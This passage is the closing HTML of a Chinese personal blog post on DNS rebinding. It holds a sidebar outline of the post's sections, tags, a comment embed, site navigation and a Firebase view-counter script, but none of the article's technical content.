<p>另感谢和我共同学习讨论该技术的<a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_39584315">@lys</a></p>

    </div>
    
    <div class="footer clearfix">
        <div class="tags float-left">
            
                <span>标签</span>
                
                <a href="/tags/DNSRebind" rel="tag">DNSRebind</a>
                
                <a href="/tags/%E6%94%BB%E5%87%BB%E5%A4%8D%E7%8E%B0" rel="tag">攻击复现</a>
                
                <a href="/tags/%E6%94%BB%E5%87%BB%E7%A0%94%E7%A9%B6" rel="tag">攻击研究</a>
                
            
        </div>
        <div class="tool float-right d-none d-lg-block">
            <div data-toggle="tooltip" data-html="true"
                 data-original-title="最后更新：2022年02月23日">
                <span>最后更新：2022年02月23日</span>
            </div>
        </div>
    </div>
    
</div>

<div class="comments" id="comments">
    
    <h3 class="title">文章评论</h3>
    <div id="disqus_thread"></div>
    <script type="text/javascript">
    (function () {
        var disqus_config = function () {
            this.page.url = 'https://war9.cn/2022/02/23/DNSRebind%E6%94%BB%E5%87%BB/';
            this.page.identifier = '2022/02/23/DNSRebind攻击/';
            this.page.title = 'DNSRebind攻击';
        };
        var d = document,
            s = d.createElement('script');
        s.async = true;

        s.src = 'https://Uncl3N1n3.disqus.com/embed.js';
        s.setAttribute('data-timestamp', '' + +new Date());
        (d.head || d.body).appendChild(s);
    })();

</script>

    <script id="dsq-count-scr" src="https://Uncl3N1n3.disqus.com/count.js" async></script>


</div>
            </div>
            <div class="col-lg-4 sidebar d-none d-lg-block">
                
    
        

        
            <div class="widget w-about">
    <div class="background"
         style="background:url(/img/about-background.png) no-repeat center center;-webkit-background-size: cover; -moz-background-size: cover; -o-background-size: cover; background-size: cover;"></div>
    <div class="wrapper text-center">
        <img src="/img/avatar.jpg">
    </div>
    <div class="textwidget text-center"><p class="username">小九</p>
        <p class="about">Just For Fun</p></div>
</div>
        
    
        

        
            
    <div class="widget widget_toc">
        <div class="title">
            <i class="fas fa-book"> </i>
            文章大纲
        </div>
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#DNSRebind-DNS%E9%87%8D%E7%BB%91%E5%AE%9A%E6%94%BB%E5%87%BB"><span class="toc-text">DNSRebind DNS重绑定攻击</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#1-%E5%8E%9F%E7%90%86"><span class="toc-text">1.原理</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-%E6%94%BB%E5%87%BB%E5%9C%BA%E6%99%AF"><span class="toc-text">2.攻击场景</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%92%93%E9%B1%BC%E5%9C%BA%E6%99%AF"><span class="toc-text">钓鱼场景</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%BB%95%E8%BF%87SSRF%E6%A3%80%E6%9F%A5"><span class="toc-text">绕过SSRF检查</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%94%BB%E5%87%BB%E5%86%85%E7%BD%91%E8%AE%BE%E6%96%BD"><span class="toc-text">攻击内网设施</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-%E5%A4%8D%E7%8E%B0%E7%BB%93%E6%9E%9C"><span class="toc-text">3.复现结果</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4-%E5%A4%8D%E7%8E%B0%E6%AD%A5%E9%AA%A4"><span class="toc-text">4.复现步骤</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#DNS-Rebind-Toolkit%E9%83%A8%E7%BD%B2"><span class="toc-text">DNS-Rebind-Toolkit部署</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%AE%BE%E7%BD%AEDNS%E8%A7%A3%E6%9E%90"><span class="toc-text">设置DNS解析</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%B0%86%E6%81%B6%E6%84%8F%E9%93%BE%E6%8E%A5%E5%8F%91%E9%80%81%E7%BB%99%E5%91%98%E5%B7%A5"><span class="toc-text">将恶意链接发送给员工</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#5-%E9%98%B2%E6%8A%A4%E6%8E%AA%E6%96%BD"><span class="toc-text">5.防护措施</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%94%A8%E6%88%B7%E4%BE%A7"><span class="toc-text">用户侧</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%9A%E5%8A%A1%E4%BE%A7"><span class="toc-text">业务侧</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#6-%E4%B8%80%E4%BA%9B%E5%85%B6%E4%BB%96%E7%BB%86%E8%8A%82"><span class="toc-text">6.一些其他细节</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#7-%E5%BC%95%E7%94%A8%E6%88%96%E5%8F%82%E8%80%83%E8%B5%84%E6%96%99"><span class="toc-text">7.引用或参考资料</span></a></li></ol></li></ol>
    </div>


        
    
        

        
            

<div class="widget w-search">
    <div class="item" id="search-form">
        <div id="result-mask" class="hide"></div>
        
        <div class="input-group mt-2 mb-2">
            <input id="search-key" class="form-control" type="search" autocomplete="off" placeholder="搜点什么呢?">
            <div class="input-group-append">
                <button type="button" class="btn btn-primary btn-search" id="search-local">搜索</button>
            </div>
        </div>
        
    </div>
    <div id="result-wrap" class="hide">
        <div id="search-result" class="search-result"></div>
    </div>
    <div class="hide">
        <template id="search-tpl">
            <div class="item">
                <a href="/{path}" title="{title}">
                    <div class="title">{title}</div>
                    <div class="content">{content}</div>
                </a>
            </div>
        </template>
    </div>
</div>

        
    
        

        
            
<div class="widget widget_categories">
    <div class="title">
        <i class="fas fa-book"> </i>
        分类目录
    </div>
    <ul>
        
        <li class="cat-item cat-item-index"><a
                    href="/categories/develop/">编程开发</a>
        </li>
        
        <li class="cat-item cat-item-index"><a
                    href="/categories/develop/Yii2/">Yii2</a>
        </li>
        
        <li class="cat-item cat-item-index"><a
                    href="/categories/myspace/">随笔</a>
        </li>
        
        <li class="cat-item cat-item-index"><a
                    href="/categories/resources/">工具资源</a>
        </li>
        
        <li class="cat-item cat-item-index"><a
                    href="/categories/develop/Django/">Django</a>
        </li>
        
        <li class="cat-item cat-item-index"><a
                    href="/categories/security/">信息安全</a>
        </li>
        
    </ul>
</div>

        
    
        

        
            
<div class="widget w-tags">
    <div class="title">
        <i class="fas fa-cloud" id="tags_switch"> </i>
        标签聚合
<!--        <div class="tags-random"><i class="fas fa-sync" id="change_tags"> 换一批</i> </div>-->
    </div>
    <div class="item">
        
        
        
            
                <a href="/tags/yii2-%E4%BA%8B%E4%BB%B6/">yii2-事件</a>
            
                <a href="/tags/DatePicker/">DatePicker</a>
            
                <a href="/tags/yii2%E4%BA%8B%E4%BB%B6/">yii2事件</a>
            
                <a href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">渗透测试</a>
            
                <a href="/tags/CDN/">CDN</a>
            
                <a href="/tags/%E5%90%8C%E6%AD%A5%E6%95%B0%E6%8D%AE/">同步数据</a>
            
        
    </div>
</div>

        
    
        

        
            
<div class="widget w-recommended">
    <div class="nav nav-tabs d-none d-xl-flex" id="nav-tab" role="tablist">
        <a class="nav-item nav-link active" id="nav-random-tab" data-toggle="tab" href="#nav-random" role="tab"
           aria-controls="nav-random" aria-selected="true"><i class="kicon i-tabrandom"></i>随机</a>
        <a class="nav-item nav-link " id="nav-new-tab" data-toggle="tab" href="#nav-new" role="tab"
           aria-controls="nav-new" aria-selected="false"><i class="kicon i-tabnew"></i>最新</a>
        
        <a class="nav-item nav-link" id="nav-hot-tab" data-toggle="tab" href="#nav-hot" role="tab"
           aria-controls="nav-hot" aria-selected="false"><i class="kicon i-tabhot"></i>热点</a>
        
    </div>
    <div class="nav nav-tabs d-xl-none" id="nav-tab" role="tablist">
        <a class="nav-item nav-link active" id="nav-random-tab" data-toggle="tab" href="#nav-random" role="tab"
           aria-controls="nav-random" aria-selected="true">随机</a>
        <a class="nav-item nav-link " id="nav-new-tab" data-toggle="tab" href="#nav-new" role="tab"
           aria-controls="nav-new" aria-selected="false">最新</a>
        
        <a class="nav-item nav-link" id="nav-hot-tab" data-toggle="tab" href="#nav-hot" role="tab"
           aria-controls="nav-hot" aria-selected="false">热点</a>
        
    </div>
    <div class="tab-content" id="nav-tabContent">
        
        <div class="tab-pane fade show active" id="nav-random" role="tabpanel" aria-labelledby="nav-random-tab">
            



    
    
        <a class="bookmark-item" title="【算法】变量交换"
           href="/2018/01/24/algorithmExchange-variables/"
           rel="bookmark"><i class="fas fa-pencil-alt"> </i> 【算法】变量交换</a>
    
        <a class="bookmark-item" title="Git仓库同步附脚本"
           href="/2020/08/21/Git%E4%BB%93%E5%BA%93%E8%BF%81%E7%A7%BB%E9%99%84%E8%84%9A%E6%9C%AC/"
           rel="bookmark"><i class="fas fa-pencil-alt"> </i> Git仓库同步附脚本</a>
    
        <a class="bookmark-item" title="第一篇Hexo文章"
           href="/2017/12/28/%E7%AC%AC%E4%B8%80%E7%AF%87Hexo%E6%96%87%E7%AB%A0/"
           rel="bookmark"><i class="fas fa-pencil-alt"> </i> 第一篇Hexo文章</a>
    
        <a class="bookmark-item" title="Yii2 资源大全"
           href="/2018/01/08/Yii2-resources/"
           rel="bookmark"><i class="fas fa-pencil-alt"> </i> Yii2 资源大全</a>
    
        <a class="bookmark-item" title="Yii2 Audit插件的使用【日志记录插件】"
           href="/2018/01/02/yii2-audit%E6%8F%92%E4%BB%B6%E7%9A%84%E4%BD%BF%E7%94%A8/"
           rel="bookmark"><i class="fas fa-pencil-alt"> </i> Yii2 Audit插件的使用【日志记录插件】</a>
    
        <a class="bookmark-item" title="常见容器漏洞总结"
           href="/2021/05/07/%E5%B8%B8%E8%A7%81%E5%AE%B9%E5%99%A8%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93/"
           rel="bookmark"><i class="fas fa-pencil-alt"> </i> 常见容器漏洞总结</a>
    

        </div>
        <div class="tab-pane fade" id="nav-new" role="tabpanel" aria-labelledby="nav-new-tab">
            
    
        
        <a class="bookmark-item" title="DNSRebind攻击"
           href="/2022/02/23/DNSRebind%E6%94%BB%E5%87%BB/"
           rel="bookmark"><i class="fas fa-pencil-alt"> </i> DNSRebind攻击</a>
        
    
        
        <a class="bookmark-item" title="MySQL数据同步到ElasticSearch(Logstash方案)爬坑纪实"
           href="/2021/08/11/MySQL%E6%95%B0%E6%8D%AE%E5%90%8C%E6%AD%A5%E5%88%B0ElasticSearch-Logstash%E6%96%B9%E6%A1%88-%E7%88%AC%E5%9D%91%E7%BA%AA%E5%AE%9E/"
           rel="bookmark"><i class="fas fa-pencil-alt"> </i> MySQL数据同步到ElasticSearch(Logstash方案)爬坑纪实</a>
        
    
        
        <a class="bookmark-item" title="自动化编排学习（一）部署篇"
           href="/2021/06/07/%E8%87%AA%E5%8A%A8%E5%8C%96%E7%BC%96%E6%8E%92%E5%AD%A6%E4%B9%A0%E9%83%A8%E7%BD%B2%E7%AF%87/"
           rel="bookmark"><i class="fas fa-pencil-alt"> </i> 自动化编排学习（一）部署篇</a>
        
    
        
        <a class="bookmark-item" title="常见容器漏洞总结"
           href="/2021/05/07/%E5%B8%B8%E8%A7%81%E5%AE%B9%E5%99%A8%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93/"
           rel="bookmark"><i class="fas fa-pencil-alt"> </i> 常见容器漏洞总结</a>
        
    
        
        <a class="bookmark-item" title="免费CDN加速手把手教程"
           href="/2021/03/06/%E5%85%8D%E8%B4%B9CDN%E5%8A%A0%E9%80%9F%E6%89%8B%E6%8A%8A%E6%89%8B%E6%95%99%E7%A8%8B/"
           rel="bookmark"><i class="fas fa-pencil-alt"> </i> 免费CDN加速手把手教程</a>
        
    
        
        <a class="bookmark-item" title="Hexo加速"
           href="/2021/02/18/Hexo%E5%8A%A0%E9%80%9F/"
           rel="bookmark"><i class="fas fa-pencil-alt"> </i> Hexo加速</a>
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    




        </div>
        
            <div class="tab-pane fade" id="nav-hot" role="tabpanel" aria-labelledby="nav-hot-tab">
            </div>
        
    </div>
</div>

        
    

            </div>
        </div>
    </div>
</div>

<div class="k-footer">
    <div class="f-toolbox">
        <div class="gotop ">
            <div class="gotop-btn">
                <span class="kicon i-up"></span>
            </div>
        </div>
        

    </div>
    <div class="container">
        <div class="row">
            <div class="col-12 text-center">
                <p class="social">
                    
                        
                        
                    
                    <!--                    <?php-->
                    <!--                    $social = array('s_sina', 's_bilibili', 's_coding', 's_gitee', 's_twitter', 's_telegram', 's_linkedin', 's_youtube', 's_github', 's_stackflow', 's_email');-->
                    <!--                    foreach ($social as $social) {-->
                    <!--                        if (kratos_option($social)) {-->
                    <!--                            echo '<a target="_blank" rel="nofollow" href="' . kratos_option($social . '_url') . '"><i class="kicon i-' . str_replace("s_", "", $social) . '"></i></a>';-->
                    <!--                    }-->
                    <!--                    }-->
                    <!--                    ?>-->
                </p>
                <p>
                    COPYRIGHT © 2021 <a
                            href="/">小九博客</a> ALL RIGHTS RESERVED.
                </p>
            </div>
        </div>
    </div>
</div>

    
        <script src="https://lf9-cdn-tos.bytecdntp.com/cdn/expire-1-y/bootstrap/4.5.3/js/bootstrap.bundle.min.js"></script>
    
        <script src="https://lf3-cdn-tos.bytecdntp.com/cdn/expire-1-M/layer/3.1.1/layer.min.js"></script>
    
        <script src="/js/kratos.min.js?ver=3.2.5"></script>
    
        <script src="/js/comments.min.js?ver=3.2.5"></script>
    



    <script src="/js/widgets/search.js"></script>


    <script src="/js/widgets/tags.js"></script>



    <script src="https://www.gstatic.com/firebasejs/8.2.6/firebase-app.js"></script>
<script src="https://www.gstatic.com/firebasejs/8.2.6/firebase-firestore.js"></script>
<script>
    var hotest = []
    $(function(){
        var firebaseConfig = {
            apiKey: "AIzaSyDNd2Yn4CxzvywabcXbRCnAnHxlqqjcZRY",
            authDomain: "blog-93530.firebaseapp.com",
            projectId: "blog-93530",
            storageBucket: "blog-93530.appspot.com",
            messagingSenderId: "11551113906",
            appId: "1:11551113906:web:0a298c6ecf2e73d15dbfab",
            measurementId: "G-HEYJLNQ883"
        };
        // Initialize Firebase
        firebase.initializeApp(firebaseConfig);

        function initHotest(articles){
            articles.orderBy("count","desc").limit(6).get().then(function(items){
                items.forEach(function(doc){
                    $("#nav-hot").append(
                        "        <a class=\"bookmark-item\" title=\""+doc.id+"\"\n" +
                        "           href=\"/"+doc.data().path+"\"\n" +
                        "           rel=\"bookmark\"><i class=\"fas fa-pencil-alt\"> </i> "+doc.id+"</a>"
                    )
                })
            })
        }
        function getCount(doc, increaseCount, url_path) {
            //increaseCount will be false when not in article page
            return doc.get().then(function (d) {
                var count
                if (!d.exists) { //has no data, initialize count
                    if (increaseCount) {
                        if (url_path) {
                            doc.set({
                                count: 1,
                                path: url_path
                            })
                        }else{
                            doc.set({
                                count: 1
                            })
                        }
                        count = 1
                    }
                    else {
                        count = 0
                    }
                }
                else { //has data
                    count = d.data().count
                    if (increaseCount) {
                        if (!(window.localStorage && window.localStorage.getItem(title))) { //if first view this article
                            if (url_path) {
                                doc.set({
                                    count: count + 1,
                                    path: url_path
                                })
                            }else{
                                doc.set({
                                    count: count + 1
                                })
                            }
                            count++
                        }
                    }
                }
                if (window.localStorage && increaseCount) { //mark as visited
                    localStorage.setItem(title, true)
                }

                return count
            })
        }

        function appendCountTo(el) {
            return function (count) {
                $(el).append(
                    $('<span>').addClass('post-visitors-count').append(

                    ).append(
                        $('<span>').addClass('post-meta-item-icon').append(
                            $('<i>').addClass('kicon i-hot')
                        )
                    ).append($('<span>').text(count + '点热度'))
                )
            }
        }
        var db = firebase.firestore()
        var articles = db.collection('articles')

        initHotest(articles)

        //https://hexo.io/zh-tw/docs/variables.html
        var isPost = 'DNSRebind攻击'.length > 0
        var isArchive = 'false' === 'true'
        var isCategory = 'false' === 'true'
        var isTag = 'false' === 'true'
        if (isPost) { //is article page
            var title = 'DNSRebind攻击'
            var path = '2022/02/23/DNSRebind攻击/'
            var doc = articles.doc(title)
            getCount(doc, true,path).then(appendCountTo($('.post-meta')))
        } else { //is index page
            var titles = []; //array to titles
            
            var promises = titles.map(function (title) {
                return articles.doc(title)
            }).map(function (doc) {
                return getCount(doc)
            })
            Promise.all(promises).then(function (counts) {
                var metas = $('.post-meta')
                counts.forEach(function (val, idx) {
                    appendCountTo(metas[idx])(val)
                })
            })
        }
    })
</script>

</body>

</html>